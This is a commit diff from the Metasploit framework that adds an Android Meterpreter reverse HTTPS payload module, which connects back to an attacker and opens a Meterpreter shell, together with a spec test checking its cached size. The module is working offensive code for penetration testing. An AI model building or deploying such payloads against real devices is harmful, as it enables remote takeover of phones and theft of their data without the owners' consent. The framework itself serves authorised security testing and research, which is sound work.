Land rapid7#7920, android/meterpreter_reverse_https

timwr · timwr · commit d0f6d4ef45c7 · 2017-02-07T20:42:47.000+08:00
diff --git a/modules/payloads/singles/android/meterpreter_reverse_https.rb b/modules/payloads/singles/android/meterpreter_reverse_https.rb
@@ -0,0 +1,54 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/android'
+require 'msf/core/payload/uuid/options'
+require 'msf/base/sessions/meterpreter_android'
+require 'msf/base/sessions/meterpreter_options'
+require 'rex/payloads/meterpreter/config'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Single
+  include Msf::Payload::Android
+  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
+
+
+  def initialize(info = {})
+
+    super(merge_info(info,
+      'Name'        => 'Android Meterpreter Shell, Reverse HTTPS Inline',
+      'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttps,
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android,
+      'Payload'     => '',
+      ))
+  end
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_https(opts)
+  end
+
+  def generate_jar(opts={})
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    opts[:uri] = generate_uri_uuid_mode(:connect, uri_req_len)
+    opts[:stageless] = true
+    super(opts)
+  end
+
+end
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
@@ -45,6 +45,16 @@
                           reference_name: 'aix/ppc/shell_reverse_tcp'
   end
 
+  context 'android/meterpreter_reverse_https' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/android/meterpreter_reverse_https'
+                          ],
+                          dynamic_size: true,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'android/meterpreter_reverse_https'
+  end
+
   context 'android/meterpreter_reverse_http' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
